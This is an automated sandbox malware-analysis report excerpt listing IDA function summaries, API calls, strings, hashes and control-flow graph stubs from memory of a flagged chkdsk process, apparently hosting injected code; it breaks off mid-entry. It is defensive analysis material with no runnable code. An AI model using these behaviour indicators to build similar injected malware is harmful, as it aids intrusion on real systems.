                                              • Source File: 00000015.00000002.3751618566.0000000005450000.00000040.00001000.00020000.00000000.sdmp, Offset: 05450000, based on PE: true
                                              • Associated: 00000015.00000002.3751618566.0000000005579000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000015.00000002.3751618566.000000000557D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000015.00000002.3751618566.00000000055EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_21_2_5450000_chkdsk.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 3fc1fc640d61b85be9a3a4203a26cbd4895120dfc3120661eaf89c4544583310
                                              • Instruction ID: a9f8db678e49ba04ab8c77aaa461e92847952a08dac548afb4a531579925da76
                                              • Opcode Fuzzy Hash: 3fc1fc640d61b85be9a3a4203a26cbd4895120dfc3120661eaf89c4544583310
                                              • Instruction Fuzzy Hash: E990023620141402D10075985458696402587F0301F95D012A5024565EC76989916131
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000015.00000002.3751618566.0000000005450000.00000040.00001000.00020000.00000000.sdmp, Offset: 05450000, based on PE: true
                                              • Associated: 00000015.00000002.3751618566.0000000005579000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000015.00000002.3751618566.000000000557D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000015.00000002.3751618566.00000000055EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_21_2_5450000_chkdsk.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 66f9a509cea9f2d868ae7a5bf167e56b5c1cb7ca50255626a763775052655ac0
                                              • Instruction ID: 3e96e43b25b55b3b49f40467faf807bb337cbbf83f59e67128c5f4e29a24838d
                                              • Opcode Fuzzy Hash: 66f9a509cea9f2d868ae7a5bf167e56b5c1cb7ca50255626a763775052655ac0
                                              • Instruction Fuzzy Hash: 4A90026634141442D10071584464B564025C7F1301F95C016E1064564D871DCD526136
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000015.00000002.3751618566.0000000005450000.00000040.00001000.00020000.00000000.sdmp, Offset: 05450000, based on PE: true
                                              • Associated: 00000015.00000002.3751618566.0000000005579000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000015.00000002.3751618566.000000000557D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000015.00000002.3751618566.00000000055EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_21_2_5450000_chkdsk.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: b2e14b5ca1f1ea9e14e152cedc1dab50cf63f5f442b1d095fd7d1ff3539caa3f
                                              • Instruction ID: fba94a5a33b31c19c79764387ddfd8952cc2dcfa96116f5a5c2a56b5695eb644
                                              • Opcode Fuzzy Hash: b2e14b5ca1f1ea9e14e152cedc1dab50cf63f5f442b1d095fd7d1ff3539caa3f
                                              • Instruction Fuzzy Hash: B1900226211C1042D20075684C64B57402587E0303F95C116A0154564CCA1989615531
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000015.00000002.3751618566.0000000005450000.00000040.00001000.00020000.00000000.sdmp, Offset: 05450000, based on PE: true
                                              • Associated: 00000015.00000002.3751618566.0000000005579000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000015.00000002.3751618566.000000000557D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000015.00000002.3751618566.00000000055EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_21_2_5450000_chkdsk.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 67ff548f2016fb4240e4909179e9c69435d5733dd0f3e505af9a8c30f66c6d5c
                                              • Instruction ID: 546d5091945878fa571efd326797d3ce6337ff4418ec673439d77116986064d6
                                              • Opcode Fuzzy Hash: 67ff548f2016fb4240e4909179e9c69435d5733dd0f3e505af9a8c30f66c6d5c
                                              • Instruction Fuzzy Hash: 0590027620141402D14071584454796402587E0301F95C012A5064564E875D8ED56675
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000015.00000002.3751618566.0000000005450000.00000040.00001000.00020000.00000000.sdmp, Offset: 05450000, based on PE: true
                                              • Associated: 00000015.00000002.3751618566.0000000005579000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000015.00000002.3751618566.000000000557D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000015.00000002.3751618566.00000000055EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_21_2_5450000_chkdsk.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: adf8a600e8bbd8f7b4d3f61896a45204348cef1764e807181f2e0d9397393249
                                              • Instruction ID: a58d77caf3dd9683130f3ba5af00ee6ab81e28792bee9a8c9105c91411039168
                                              • Opcode Fuzzy Hash: adf8a600e8bbd8f7b4d3f61896a45204348cef1764e807181f2e0d9397393249
                                              • Instruction Fuzzy Hash: 7A90026620241003410571584464666802A87F0201B95C022E10145A0DC62989916135
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000015.00000002.3751618566.0000000005450000.00000040.00001000.00020000.00000000.sdmp, Offset: 05450000, based on PE: true
                                              • Associated: 00000015.00000002.3751618566.0000000005579000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000015.00000002.3751618566.000000000557D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000015.00000002.3751618566.00000000055EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_21_2_5450000_chkdsk.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: e02d325c59966d663d36d2237d56ca4062a704f684054d621fa8999685013afa
                                              • Instruction ID: 10ab2f2d2fb23139e645c539f3b08d0d8e531c2c2f5d9370463ae33aa51fa964
                                              • Opcode Fuzzy Hash: e02d325c59966d663d36d2237d56ca4062a704f684054d621fa8999685013afa
                                              • Instruction Fuzzy Hash: CB90023620545842D14071584454A96403587E0305F95C012A00646A4D97298E55B671
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000015.00000002.3751618566.0000000005450000.00000040.00001000.00020000.00000000.sdmp, Offset: 05450000, based on PE: true
                                              • Associated: 00000015.00000002.3751618566.0000000005579000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000015.00000002.3751618566.000000000557D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000015.00000002.3751618566.00000000055EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_21_2_5450000_chkdsk.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: c8dc2235349714bfd35b2c47144601951a172324338866bb35bf33b2806be860
                                              • Instruction ID: ba096ae35e3936aabdb5f05043beb92a64bbce32196ade119131613a5236858b
                                              • Opcode Fuzzy Hash: c8dc2235349714bfd35b2c47144601951a172324338866bb35bf33b2806be860
                                              • Instruction Fuzzy Hash: C690023620141802D1807158445469A402587E1301FD5C016A0025664DCB198B5977B1
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000015.00000002.3751618566.0000000005450000.00000040.00001000.00020000.00000000.sdmp, Offset: 05450000, based on PE: true
                                              • Associated: 00000015.00000002.3751618566.0000000005579000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000015.00000002.3751618566.000000000557D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000015.00000002.3751618566.00000000055EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_21_2_5450000_chkdsk.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: aeed9dc4cf6f74bfd3bfc04599c881d9266c9d441816444a612f42523445da04
                                              • Instruction ID: e040f4a7feb52f6b60b3cdae4431693ad09afaaf89c523d5aad758abd4c1b5e8
                                              • Opcode Fuzzy Hash: aeed9dc4cf6f74bfd3bfc04599c881d9266c9d441816444a612f42523445da04
                                              • Instruction Fuzzy Hash: 6890023660551402D10071584564756502587E0201FA5C412A0424578D87998A5165B2

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 243 a49080-a490c2 call a4bd40 246 a4919c-a491a2 243->246 247 a490c8-a49118 call a4be10 call a3acf0 call a44e50 243->247 254 a49120-a49131 Sleep 247->254 255 a49196-a4919a 254->255 256 a49133-a49139 254->256 255->246 255->254 257 a49163-a49184 call a48eb0 256->257 258 a4913b-a49161 call a48ca0 256->258 262 a49189-a4918c 257->262 258->262 262->255
                                              APIs
                                              • Sleep.KERNELBASE(000007D0), ref: 00A49128
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000015.00000002.3740186868.0000000000A30000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A30000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_21_2_a30000_chkdsk.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Sleep
                                              • String ID: net.dll$wininet.dll
                                              • API String ID: 3472027048-1269752229
                                              • Opcode ID: 3f90cbdbfa848113bdf14e9c4ef4c32a33f53125a7f9dfad81e1e2f8edbaee94
                                              • Instruction ID: 46b1390ec0df70afffbc672c9d181e43bf7068b32077ea52ce9ece0d7c109de2
                                              • Opcode Fuzzy Hash: 3f90cbdbfa848113bdf14e9c4ef4c32a33f53125a7f9dfad81e1e2f8edbaee94
                                              • Instruction Fuzzy Hash: E63172B6500745BBC724DF68D885FA7B7B8FB88B00F10811DF62A5B245D774B560CBA4

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 263 a49076-a490c2 call a4bd40 268 a4919c-a491a2 263->268 269 a490c8-a49118 call a4be10 call a3acf0 call a44e50 263->269 276 a49120-a49131 Sleep 269->276 277 a49196-a4919a 276->277 278 a49133-a49139 276->278 277->268 277->276 279 a49163-a49184 call a48eb0 278->279 280 a4913b-a49161 call a48ca0 278->280 284 a49189-a4918c 279->284 280->284 284->277
                                              APIs
                                              • Sleep.KERNELBASE(000007D0), ref: 00A49128
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000015.00000002.3740186868.0000000000A30000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A30000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_21_2_a30000_chkdsk.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Sleep
                                              • String ID: net.dll$wininet.dll
                                              • API String ID: 3472027048-1269752229
                                              • Opcode ID: 2bab2304ff4e1f375eba77d2fba72b094534cec93190325bc4864e3f24ea117c
                                              • Instruction ID: 380933f6e123adbb7f7c7227f3e884d5a1bc87333c11583dc6219d01639b3489
                                              • Opcode Fuzzy Hash: 2bab2304ff4e1f375eba77d2fba72b094534cec93190325bc4864e3f24ea117c
                                              • Instruction Fuzzy Hash: 0321B4B6900305BBC724EF68C885FA7B7B8FB88B00F10811DF62D5B245D774A960CBA5

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 293 a4a6a2-a4a6a9 294 a4a668 293->294 295 a4a6ab-a4a6cf call a4af60 293->295 296 a4a6d0-a4a6dc 294->296 297 a4a66a-a4a687 call a4af60 294->297 295->296 302 a4a68c-a4a6a1 RtlFreeHeap 297->302
                                              APIs
                                              • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00A33AF8), ref: 00A4A69D
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000015.00000002.3740186868.0000000000A30000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A30000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_21_2_a30000_chkdsk.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: FreeHeap
                                              • String ID: .z`
                                              • API String ID: 3298025750-1441809116
                                              • Opcode ID: b021346bb888f04023bfcdab05f5bb28e7ee40b0cb20714bdca28e131391f387
                                              • Instruction ID: d113d6432e8887ca58ad825222e1915491d00d094198e174ecebcfde02c871c3
                                              • Opcode Fuzzy Hash: b021346bb888f04023bfcdab05f5bb28e7ee40b0cb20714bdca28e131391f387
                                              • Instruction Fuzzy Hash: A8019EB5650218BBDB24DFA8DC85EE77BACEF88790F118558F90D97241C630E901CBA0

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 311 a4a665-a4a686 312 a4a68c-a4a6a1 RtlFreeHeap 311->312 313 a4a687 call a4af60 311->313 313->312
                                              APIs
                                              • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00A33AF8), ref: 00A4A69D
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000015.00000002.3740186868.0000000000A30000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A30000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_21_2_a30000_chkdsk.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: FreeHeap
                                              • String ID: .z`
                                              • API String ID: 3298025750-1441809116
                                              • Opcode ID: 84d6225e0a771cc4befa87659d0d2225b39b0fc8edda382473b7330ac4829a72
                                              • Instruction ID: d14f59601d53b25a1fc08a23938de15a561277896cc42cb10c6ed945d80ec676
                                              • Opcode Fuzzy Hash: 84d6225e0a771cc4befa87659d0d2225b39b0fc8edda382473b7330ac4829a72
                                              • Instruction Fuzzy Hash: 70E09AB1210208AFD714DFA9CC84FA777A8EF88750F008259FD0C9B241C630E901CBB0

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 314 a4a670-a4a686 315 a4a68c-a4a6a1 RtlFreeHeap 314->315 316 a4a687 call a4af60 314->316 316->315
                                              APIs
                                              • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00A33AF8), ref: 00A4A69D
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000015.00000002.3740186868.0000000000A30000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A30000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_21_2_a30000_chkdsk.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: FreeHeap
                                              • String ID: .z`
                                              • API String ID: 3298025750-1441809116
                                              • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                              • Instruction ID: c069459b2a589041283686749aa9f0f6115523038d93544ce10c3e61414922f4
                                              • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                              • Instruction Fuzzy Hash: EAE046B5200208ABDB18EF99CC49EA777ACEF88750F118558FE0C5B242C630F914CAF0

                                              Control-flow Graph

                                              APIs
                                              • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 00A3836A
                                              • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 00A3838B
                                              Memory Dump Source
                                              • Source File: 00000015.00000002.3740186868.0000000000A30000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A30000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_21_2_a30000_chkdsk.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: MessagePostThread
                                              • String ID:
                                              • API String ID: 1836367815-0
                                              • Opcode ID: 5f05b6b279d6c49f909d1339f226ac3fd06464af047d7a2810509cc00f320aba
                                              • Instruction ID: 982603ae962c390bbaca3a2d0bd10c5d9c2c213b876a690fcb33df028b5dca7a
                                              • Opcode Fuzzy Hash: 5f05b6b279d6c49f909d1339f226ac3fd06464af047d7a2810509cc00f320aba
                                              • Instruction Fuzzy Hash: E1018831A812287BEB20AAA49D43FFE7B6C5B50F54F044155FF04BA1C1E6A4690547F6

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 332 a38310-a3831f 333 a38328-a3835a call a4ca00 call a3acf0 call a44e50 332->333 334 a38323 call a4be60 332->334 341 a3838e-a38392 333->341 342 a3835c-a3836e PostThreadMessageW 333->342 334->333 343 a38370-a3838b call a3a480 PostThreadMessageW 342->343 344 a3838d 342->344 343->344 344->341
                                              APIs
                                              • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 00A3836A
                                              • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 00A3838B
                                              Memory Dump Source
                                              • Source File: 00000015.00000002.3740186868.0000000000A30000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A30000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_21_2_a30000_chkdsk.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: MessagePostThread
                                              • String ID:
                                              • API String ID: 1836367815-0
                                              • Opcode ID: a493eabf7697513180435b5f665ed638a4e8f6b3857f93d23393bef0d0da5e70
                                              • Instruction ID: 4ab74793429d89e31c82545ac8551773ea50abca02a39eafa8098f69d0fec401
                                              • Opcode Fuzzy Hash: a493eabf7697513180435b5f665ed638a4e8f6b3857f93d23393bef0d0da5e70
                                              • Instruction Fuzzy Hash: 0901A231A813287BEB20AA949D43FFE776C6B40F50F040119FF04BA1C2EAE4690647F6
                                              APIs
                                              • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00A3AD62
                                              Memory Dump Source
                                              • Source File: 00000015.00000002.3740186868.0000000000A30000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A30000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_21_2_a30000_chkdsk.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Load
                                              • String ID:
                                              • API String ID: 2234796835-0
                                              • Opcode ID: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                                              • Instruction ID: ec746323cff932eae4e1a2ea3fafc7d5fc70d87e4ca55f12325a45069c9a3507
                                              • Opcode Fuzzy Hash: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                                              • Instruction Fuzzy Hash: 61011EB9E0020DABDF10DBE4DD42FDDB3789B54309F004595F90997641F671EB548B91
                                              APIs
                                              • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 00A4A734
                                              Memory Dump Source
                                              • Source File: 00000015.00000002.3740186868.0000000000A30000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A30000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_21_2_a30000_chkdsk.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CreateInternalProcess
                                              • String ID:
                                              • API String ID: 2186235152-0
                                              • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                              • Instruction ID: 8a00634d1c9e04ef7f8acc3c12075f6c846aca7e6b65f56f45d9a51b0890ccb3
                                              • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                              • Instruction Fuzzy Hash: 0E01B2B2210108BFCB54DF89DC80EEB77ADAF8C754F158258FA0D97241C630E851CBA4
                                              APIs
                                              • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,00A3F050,?,?,00000000), ref: 00A491EC
                                              Memory Dump Source
                                              • Source File: 00000015.00000002.3740186868.0000000000A30000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A30000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_21_2_a30000_chkdsk.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CreateThread
                                              • String ID:
                                              • API String ID: 2422867632-0
                                              • Opcode ID: 31c5d0ee231ec7bfd250f3fa6c59ac425944430061f7801c93529314b70287fd
                                              • Instruction ID: 93a46544844cc1f726228f8c3ac1ff0760e617cf14f7fed35b83da65ae856b3a
                                              • Opcode Fuzzy Hash: 31c5d0ee231ec7bfd250f3fa6c59ac425944430061f7801c93529314b70287fd
                                              • Instruction Fuzzy Hash: 4EE06D7B3802043AE3206599AC03FE7B29CDBC1B20F550026FA0DEA2C1D995F80142A4
                                              APIs
                                              • LookupPrivilegeValueW.ADVAPI32(00000000,?,00A3F1D2,00A3F1D2,?,00000000,?,?), ref: 00A4A800
                                              Memory Dump Source
                                              • Source File: 00000015.00000002.3740186868.0000000000A30000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A30000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_21_2_a30000_chkdsk.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: LookupPrivilegeValue
                                              • String ID:
                                              • API String ID: 3899507212-0
                                              • Opcode ID: 8406958569be5b9d135379767e2730bf378bdf8e72f5a52742653761f5934417
                                              • Instruction ID: 4066cfa208478f2b8df9e55bd327c112151ffaaa49a62cbb41eea1bd61f3443d
                                              • Opcode Fuzzy Hash: 8406958569be5b9d135379767e2730bf378bdf8e72f5a52742653761f5934417
                                              • Instruction Fuzzy Hash: 77F039F5201208AFDB10EF58CC85EDB37A9EF89210F118459FD4857742CA30E8098BB1
                                              APIs
                                              • RtlAllocateHeap.NTDLL(00A44536,?,00A44CAF,00A44CAF,?,00A44536,?,?,?,?,?,00000000,00000000,?), ref: 00A4A65D
                                              Memory Dump Source
                                              • Source File: 00000015.00000002.3740186868.0000000000A30000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A30000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_21_2_a30000_chkdsk.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: AllocateHeap
                                              • String ID:
                                              • API String ID: 1279760036-0
                                              • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                              • Instruction ID: 15636b7419eff48a6aaa33bfbc85b87090037bb3fdc70fc476c4c06b5a4ee54d
                                              • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                              • Instruction Fuzzy Hash: 31E012B5200208ABDB14EF99CC41EA777ACEF88654F118558BE085B242C630F9158AB0
                                              APIs
                                              • LookupPrivilegeValueW.ADVAPI32(00000000,?,00A3F1D2,00A3F1D2,?,00000000,?,?), ref: 00A4A800
                                              Memory Dump Source
                                              • Source File: 00000015.00000002.3740186868.0000000000A30000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A30000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_21_2_a30000_chkdsk.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: LookupPrivilegeValue
                                              • String ID:
                                              • API String ID: 3899507212-0
                                              • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                              • Instruction ID: c669a9b56138d46c3ed845df68a50b55a077a97a4450186a3c95c1c5c9210d53
                                              • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                              • Instruction Fuzzy Hash: 36E01AB52002086BDB10DF49CC85EE737ADEF88650F118154BE0C57241C930E8158BF5
                                              APIs
                                              • SetErrorMode.KERNELBASE(00008003,?,00A38D14,?), ref: 00A3F6FB
                                              Memory Dump Source
                                              • Source File: 00000015.00000002.3740186868.0000000000A30000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A30000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_21_2_a30000_chkdsk.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ErrorMode
                                              • String ID:
                                              • API String ID: 2340568224-0
                                              • Opcode ID: de6795d62a426a213648570ffdae4ab92952a9be95c0e28fb31522a874547db2
                                              • Instruction ID: d104dc81cac4ad6b5929ed44ca7926f2a9fabd5730b2d3f3605164a89e3d9c87
                                              • Opcode Fuzzy Hash: de6795d62a426a213648570ffdae4ab92952a9be95c0e28fb31522a874547db2
                                              • Instruction Fuzzy Hash: FEE08C65A502006AEB10EFA08C52F523696AB45B00F0904A9F9899A283EA21E0008610
                                              APIs
                                              • LookupPrivilegeValueW.ADVAPI32(00000000,?,00A3F1D2,00A3F1D2,?,00000000,?,?), ref: 00A4A800
                                              Memory Dump Source
                                              • Source File: 00000015.00000002.3740186868.0000000000A30000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A30000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_21_2_a30000_chkdsk.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: LookupPrivilegeValue
                                              • String ID:
                                              • API String ID: 3899507212-0
                                              • Opcode ID: 578ac63ab9fd4ff67b06f1025adf97e8060d9213d5230ceed42daeff64033b6f
                                              • Instruction ID: e1b1756285582238a6e1c4a294189b27591dfb8c143c88071466d797869fff28
                                              • Opcode Fuzzy Hash: 578ac63ab9fd4ff67b06f1025adf97e8060d9213d5230ceed42daeff64033b6f
                                              • Instruction Fuzzy Hash: 8CD0A73A1481440EE702ABA878800F5BB14C9D16347458083E4DC87502D13546148392
                                              APIs
                                              • SetErrorMode.KERNELBASE(00008003,?,00A38D14,?), ref: 00A3F6FB
                                              Memory Dump Source
                                              • Source File: 00000015.00000002.3740186868.0000000000A30000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A30000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_21_2_a30000_chkdsk.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ErrorMode
                                              • String ID:
                                              • API String ID: 2340568224-0
                                              • Opcode ID: 2932bcf02bc07d7163de81b169680dc5c005ffd35bbbe1c0c8f45c66faab01c4
                                              • Instruction ID: f812d8a956485b569c726aecfe07ec753e2dd7d6d7f1c266a0f9be6f3d6e1d8a
                                              • Opcode Fuzzy Hash: 2932bcf02bc07d7163de81b169680dc5c005ffd35bbbe1c0c8f45c66faab01c4
                                              • Instruction Fuzzy Hash: 05D05E656503082AE610AAA49C03F6632896B44B00F490064F948962C3D960E4004165
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000015.00000002.3751618566.0000000005450000.00000040.00001000.00020000.00000000.sdmp, Offset: 05450000, based on PE: true
                                              • Associated: 00000015.00000002.3751618566.0000000005579000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000015.00000002.3751618566.000000000557D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000015.00000002.3751618566.00000000055EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_21_2_5450000_chkdsk.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: f8b09a6005ae5a55f7566d9178ce10efc87df4d27ea5086cf1f75d1d25ec1c88
                                              • Instruction ID: 7a7b1892928003fdebb9fef4b1a23a944d7daa87577c4f2ff5c62087c05c0762
                                              • Opcode Fuzzy Hash: f8b09a6005ae5a55f7566d9178ce10efc87df4d27ea5086cf1f75d1d25ec1c88
                                              • Instruction Fuzzy Hash: BDB09B7A9055D5C5DA51E7604608B677D2177D0701F55C0A7D3430651E477CC1D1E175
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000015.00000002.3751618566.0000000005450000.00000040.00001000.00020000.00000000.sdmp, Offset: 05450000, based on PE: true
                                              • Associated: 00000015.00000002.3751618566.0000000005579000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000015.00000002.3751618566.000000000557D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000015.00000002.3751618566.00000000055EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_21_2_5450000_chkdsk.jbxd
                                              Similarity
                                              • API ID: ___swprintf_l
                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                              • API String ID: 48624451-2108815105
                                              • Opcode ID: 93362757ed1f75cdfcebccbcd4342b22b41009a02bd4795719d45ad618124cd9
                                              • Instruction ID: a4eda680b43e4a53ecd71442b360065afcbc1bf7f672289939d8f1eac4fc79da
                                              • Opcode Fuzzy Hash: 93362757ed1f75cdfcebccbcd4342b22b41009a02bd4795719d45ad618124cd9
                                              • Instruction Fuzzy Hash: 0751CBB9B041167FCB50DF5988949FFFBB9BB48200B5482AFE499D7641E2B4DE4087A0
                                              APIs
                                              Strings
                                              Memory Dump Source
